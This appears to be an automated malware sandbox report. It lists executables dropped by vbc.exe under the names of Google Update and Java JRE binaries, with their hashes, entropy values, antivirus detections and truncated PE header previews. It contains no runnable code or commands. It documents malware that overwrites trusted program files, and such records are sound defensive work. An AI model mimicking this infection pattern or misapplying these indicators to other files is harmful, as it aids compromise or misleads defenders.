                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v.s.%.s.%.s.%...$ms.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%.s.%xr.%...$.s.%...%.s.%...$.s.%Rich.s.%................PE..d...X..d.........."..........R......L..........@....................................J..... ..................................................M....... ...2.......,................... ..T............................ ..................(............................text............................... ..`.rdata..............................@..@.data....6...p.......X..............@....pdata...,...........j..............@..@_RDATA..............................@..@.gxfg...0...........................@..@.gehcont............................@..@.rsrc....2... ...4..................@..@.reloc...`...`...P..................@...........................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1282048
                                                                                                                                                                    Entropy (8bit):5.1639687597000465
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:pWP/aK2vB+WXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:pKCKABBsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:4BF28DF7FCE57EF8E1C7E0A799600F17
                                                                                                                                                                    SHA1:93FC5D6B489CCE278BD29D5846901C2AC10CCD11
                                                                                                                                                                    SHA-256:E48216669A144CBFFB64DD7259A420CD73750D49EB1B2D6FEB9EE4DB254DCF46
                                                                                                                                                                    SHA-512:BECA291B5E43BFBE2D82D85D0B2133E0CEBD510E7C29958745A81C279B112A4865BC0961ECED82C0D585C6A3B5304EDCC1AF2106671F39BCF9FA70E9F1814DBE
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...U..U..U.M.V..U.M.P...U.M.Q..U.*.Q..U.*.V..U.*.P..U.M.T..U..T...U..\..U....U.....U..W..U.Rich..U.........PE..L...9..d.................D..........Ru.......`....@.................................0G......................................P...x....... ...........................p[..T............................[..@...............L............................text....B.......D.................. ..`.data...x....`.......H..............@....idata...............R..............@..@.rsrc... ............\..............@..@.reloc...`.......P...@..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1228288
                                                                                                                                                                    Entropy (8bit):5.162047335349573
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:UO7cCNWB+09IXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:hjNWBPmsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:FF6F45B2AA38C60923ED246D390FB730
                                                                                                                                                                    SHA1:18FE1DE178D7CAEC232113D058A255F813439500
                                                                                                                                                                    SHA-256:9B3F94D697571406029A20581D341370567342A07AC4B2B9F7406CC225EAA26A
                                                                                                                                                                    SHA-512:793E901CD8E8637E39EF39BFADAF331190ED8B85FD67E27AAC4FB9337A8829309ADB2A1EB0C6EB607C21977E9360AA53188802523B51282DDC076D65F8EAE0D4
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...:..d..........................................@.................................h........................................5..<....`..p2...........................+..T...........................X+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1302528
                                                                                                                                                                    Entropy (8bit):5.238939900445129
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:9ihRyhdsRrEsqjnhMgeiCl7G0nehbGZpbD:9ihsoRgDmg27RnWGj
                                                                                                                                                                    MD5:EF35580D4DDB60E9F39CB4B07294D552
                                                                                                                                                                    SHA1:AA4F369AB63EBBB1448B829CCA122B8CDBE6C5E7
                                                                                                                                                                    SHA-256:10EF5A60824A1C1EE5043F5AF65F6CD9479AE6E0B13C9D5F0BF06160FD503871
                                                                                                                                                                    SHA-512:13AD99309BB2A16F3A43184DA58DC9EEFCCAF77438D0617ACB1893306EE178CADF649CBD3A82707782834ED59A8182C2CEC17722FE0F5E1C965AA9D996DA18EC
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X..X..X..~*...X..~*..X...2..X...2..X...2...X...3..X..~*..X..~*..X..X..?Y...3..X...3..X..Rich.X..........PE..d...A..d.........."......R...z.......R.........@.............................p............ ..................................................p..x....................................V..T...........................0W...............p...............................text....P.......R.................. ..`.rdata.......p.......V..............@..@.data...x3...........d..............@....pdata...............t..............@..@_RDATA..............................@..@.gxfg...............................@..@.gehcont............................@..@.reloc...P... ...@..................@...........................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1342464
                                                                                                                                                                    Entropy (8bit):5.351018605211282
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:s1FDmRF+wpx/QafnsqjnhMgeiCl7G0nehbGZpbD:KmRF+wn/Jf7Dmg27RnWGj
                                                                                                                                                                    MD5:33C462812A8DCA0F7E481D691E6A30B7
                                                                                                                                                                    SHA1:7AD830A631722B7E2F1C240481A35639719B5BF5
                                                                                                                                                                    SHA-256:8CEDA8F27D7062A3CBABB189B2EF41D98DC482007506F75E9BB37D53AB7ACD91
                                                                                                                                                                    SHA-512:EC1A71EC61BDB3C55E9AF853DC39B1A86E7BCCEC3F20B261ED8D42DFC5F6A428FE350A3D855A94CA435FA584368060F6213F60B3FE5EE89402E528AD3CE5C376
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|6..8W..8W..8W...%..6W...%...W...=...W...=...W...=..{W...%.. W...%..#W..8W...V..L<...W..L<s.9W..L<..9W..Rich8W..................PE..L...Y..d.....................r....................@.................................}................................................0...2..............................T...........................h...@............................................text...e........................... ..`.rdata..b...........................@..@.data....'..........................@....rsrc....2...0...4..................@..@.reloc...p...p...`..................@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1228288
                                                                                                                                                                    Entropy (8bit):5.162004797095016
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:A2Ae621B+0YaXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:NE21BP9sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:47114312142F204AE5B8469EBFE48F30
                                                                                                                                                                    SHA1:BBCD989FF7552C9AF41FE7E8090444933542099C
                                                                                                                                                                    SHA-256:0D9CD5CAE560DB57AF5769D7B1978E208C902C5E74683701F38A54B3FD155675
                                                                                                                                                                    SHA-512:F3A3B1A73E344EA988F5F338EB9B405A1A4A99F1565D75EA655A27338C80A275C7C2C741653BE8C5E4AD8BF9436ECC982DAF9A1E0A1645E565D14CFDA33B0B34
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...;..d..........................................@.................................%........................................5..<....`..p2...........................+..T...........................h+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2151936
                                                                                                                                                                    Entropy (8bit):7.987638126345098
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:/ZkVX3lfrFfR0BecCqKBs+4o8YhA+Dmg27RnWGj:/qR1frZRpcTKX4kD527BWG
                                                                                                                                                                    MD5:6619FE6A64336993A22D0ECA85CB45F0
                                                                                                                                                                    SHA1:629CA777271C72F0B8D3F08516E4B52771B770A1
                                                                                                                                                                    SHA-256:D889D5E135CD6F6AA5A733DC3E8EEE151655245A3F8DE372D2C15BA564A062B0
                                                                                                                                                                    SHA-512:452FDCCEE219D03A65784B4C73F6272D20D155667F55121FF45B25DDBD36C0E029284DD4F103AC6E7B30D72386B684A258D36FE172970ED894C8FC6DE5F6035B
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......4.....................@.............................@!.......!... ..................................................X..P...............|....................W..............................PP..@............Z...............................text...&2.......4.................. ..`.rdata.......P.......8..............@..@.data...p....p.......N..............@....pdata..|............P..............@..@.00cfg..0............T..............@..@.retplne.............V...................rsrc................X..............@..@.reloc.......P......................@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Google\Update\Install\{6BB58CDD-A64E-41C8-8D92-79A516D3D118}\117.0.5938.134_117.0.5938.132_chrome_updater.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2151936
                                                                                                                                                                    Entropy (8bit):7.987637526577778
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:5ZkVX3lfrFfR0BecCqKBs+4o8YhA+Dmg27RnWGj:5qR1frZRpcTKX4kD527BWG
                                                                                                                                                                    MD5:D47D028032DDD4F003D4A6E81336479C
                                                                                                                                                                    SHA1:843A9A0779C6219816575876E16213DD993DB3B0
                                                                                                                                                                    SHA-256:087B4B8396A8B38B68A809763E508CA85546D9B0E241D98C4C1B3762F086B22E
                                                                                                                                                                    SHA-512:124BE638B02A4E4FCA08D61172A2E1F0AAD4721B0028AB5B11EF900DA7021DD6FBDD8264DBAAE57A743619CFFFF308383CFF34E6193DC4A1C7BD20DFE90942D6
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......4.....................@.............................@!......A!... ..................................................X..P...............|....................W..............................PP..@............Z...............................text...&2.......4.................. ..`.rdata.......P.......8..............@..@.data...p....p.......N..............@....pdata..|............P..............@..@.00cfg..0............T..............@..@.retplne.............V...................rsrc................X..............@..@.reloc.......P......................@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1158144
                                                                                                                                                                    Entropy (8bit):5.068088983231046
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:3BXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:3BsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:D571E056F9F5A9F735873A764AF451D3
                                                                                                                                                                    SHA1:EA810A74DBBCDD2F2904DCF9AE51E1ECB8F40F85
                                                                                                                                                                    SHA-256:9F5FAC6666AFA05C999B47DDE8B1DC87631D19C8585790C7D300ADE2623AD55B
                                                                                                                                                                    SHA-512:F6C579F23E6D6E86D7DA11A0DEED0020EA501FFBB957FB05C24D080C175B16386A144C4861AADD4672F09E8B6D0F26F5CC51B293D0B83EAA63679C2542D1CAB5
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8.C.VWC.VWC.VWJ..WS.VW!.WVA.VW!.SV\.VW!.RVO.VW!.UVB.VWW.WVJ.VWC.WW!.VW.SVB.VW..WB.VW.TVB.VWRichC.VW........PE..L.....d.................8...6.......4.......P....@.........................................................................$i.......................................b..T............................a..@............P...............................text....7.......8.................. ..`.rdata...#...P...$...<..............@..@.data...L............`..............@....rsrc................b..............@..@.reloc...P.......@...l..............@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                    Entropy (8bit):5.03242858683778
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:hK2Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:U2sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:37A71D5C2F7B4BD596983EA780B7DB67
                                                                                                                                                                    SHA1:C2958767FCAB3186CC48D6685703EB9D10213843
                                                                                                                                                                    SHA-256:9116B29C9BCF16EBBEF3E74F2AA440C16EDB31E3496C04F96C0EB8916F973E83
                                                                                                                                                                    SHA-512:DE1C4AC706888495CB300FAA4DD76F8C9DEB2B633E7C42FAE422840AA09EA025B4805EEF6335BC2B6CA62AC455883E8026841CCD7B57AB297085F5279584E5F9
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................C........................................&.......@..d...........................h"..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...d....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\java.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1375232
                                                                                                                                                                    Entropy (8bit):5.446081476954796
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:AnEbH0j4x7R6SvyCMPXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:AkwOtO7PsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:E12FABE0D60BF0A313E62B5196A0F16C
                                                                                                                                                                    SHA1:8F867E15EB4F83CA3CD98D161039A69387169761
                                                                                                                                                                    SHA-256:0972D3C331B553D5F16D844E13E395ACA080FA8171A51CB0F4F065BB7374F901
                                                                                                                                                                    SHA-512:725C195C4310B85A0BB4CB2D002677BD3238A4E6EB4BCBF3EE03FA476CC42AE07E8817B5EB7A7BD8EB9391D4E0BBE3619A11B616106287441BFA63BF8B52C7CB
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................@......z).......................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1212416
                                                                                                                                                                    Entropy (8bit):5.119746723452393
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:7v1vvSXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:71ysqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:4E22DD47350A9D7B6F8B2F74E79CEC5C
                                                                                                                                                                    SHA1:A7C3170575F2735A13B2A6357CC1A32FE839E6E8
                                                                                                                                                                    SHA-256:04100007EAA015E7FF6E417A98392D83999EC8607AAE2CDE2B98B9D63FC397FC
                                                                                                                                                                    SHA-512:4CEF5220E62D7FA0548726574A4B11980A04CF103380BFD16019455AD1C9E8172480BB5BB5DD0C039EDB3DB396119EFD032326DDFF20C9AFEE7815822EA5892F
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......VT.f.5.5.5.5.5.5.M\5.5.5pM.4.5.5pM.4.5.5pM.4.5.5.^.4.5.5.5.5.5.5pM.455.5.L.4.5.5.L05.5.5.L.4.5.5Rich.5.5........................PE..L.....d.................P...........K.......`....@..................................l......................................8...@......................................T...............................@............`...............................text....O.......P.................. ..`.rdata...g...`...h...T..............@..@.data...@...........................@....rsrc...............................@..@.reloc...P...p...@...@..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1375232
                                                                                                                                                                    Entropy (8bit):5.446838504983021
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:snU/h/4K4sqjnhMgeiCl7G0nehbGZpbD:sU/VkDmg27RnWGj
                                                                                                                                                                    MD5:8CD97C00F3234B12C83A095C155CD033
                                                                                                                                                                    SHA1:4D8E3834488BB0536CC28F7EE4C6520C2C0837C4
                                                                                                                                                                    SHA-256:C1E58D542671F24CD9FCA6FD7C1846837FD11B9B613F79CB92570D58893BC987
                                                                                                                                                                    SHA-512:38153CF7ED94B3A7385705F775069BCE4B24763E4BC1FB72F4AD485CA8BED3142D4D963F426BD35DC0F479D68BD7FC2667932CA7045653368A41CEEBCC3C4F1C
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................@...............................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1513984
                                                                                                                                                                    Entropy (8bit):5.483752418411204
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:ux71iBLZ05jNTmJWExDsqjnhMgeiCl7G0nehbGZpbD:uxhiHIjNgHDmg27RnWGj
                                                                                                                                                                    MD5:65EDFAD5C93E7110D6B833389A2C6DCC
                                                                                                                                                                    SHA1:1500CCAA66CB8001BAD6833FB2A46C1818D30779
                                                                                                                                                                    SHA-256:818D3FFDBFF8719F69B291ECD81E4D96C218D7E1D8725606C4E50EEBD5B107C6
                                                                                                                                                                    SHA-512:5D1FB886F902EC511170E2D19DC063C905BB7B953B756DD7EF7D98BF7A753CD9576CA43BA09B27ADF03B6F3AFAF783120870F61EDE0520BE33531E0971BDC6B6
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@.............................................................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc...p...0...`..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                    Entropy (8bit):5.032909680695335
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:q3rGXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:iysqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:E7A4ABEE6FD713D9DF65C1E2E399DD2B
                                                                                                                                                                    SHA1:587D1D2A137BD0B33BFFD48DCFD6E294663F8468
                                                                                                                                                                    SHA-256:0E56BB7B5064176C6346D4ED8C054351006F8B6764A45D55FE77306993A60FD5
                                                                                                                                                                    SHA-512:4964EA2AE60A18EDF372A501AC5212E839FA4B81D53B8E8EAF2516E794132AA08E26ADD1ECCA1FA202DEF45DC5B64B94905C85CA45F03CF017D6202D575334AA
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................w........................................&.......@..H............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...H....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1242112
                                                                                                                                                                    Entropy (8bit):5.172697908651523
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:wYdP/FXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:1dP/FsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:34B30E2AF4ADD2928FB81BAE2326279B
                                                                                                                                                                    SHA1:A253182AAD0B2618FFCAC9CD1CF2698E64E128B1
                                                                                                                                                                    SHA-256:7D325B31D051009B7AD016739883AECBCD05F78B9F8920EB65158CE496C7DF62
                                                                                                                                                                    SHA-512:902BDCB5B6498E15656CAB63B49CF6BA4E50676F1F61CF6C77035FE4925B0630911DC8336A452F3D06E70BC93BB9D890A7E7448C1F0C12D843A263AAA24EA102
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.$x..wx..wx..wq.uwn..wl..vp..w...v}..w...vu..w...v{..wx..w...w...v_..w...vy..w...vs..w...wy..w...vy..wRichx..w........PE..L...}.d..........................................@..........................P.......\..........................................h...................................`v..T............................u..@............................................text............................... ..`.rdata..R...........................@..@.data...P2..........................@....rsrc...............................@..@.reloc...`.......P..................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                    Entropy (8bit):5.032934498644877
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:Iy5eXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:1YsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:98E9B085064D5A06FCF7DBF3C37C2F35
                                                                                                                                                                    SHA1:55192B019C682C0454FBDBE8147971C77BA70A30
                                                                                                                                                                    SHA-256:EC0E180ED2A192259A4E736EC58BC47DB588942C5DD75754B77BD7ADD176392A
                                                                                                                                                                    SHA-512:A30483E78254A5C005AC225A0FDC2667C0F41F7914DA09615C20F97A2C20601D332E8B2D48C15C0138991DA6D0C1A07AC13257407691A208E927059E60E8AD4B
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
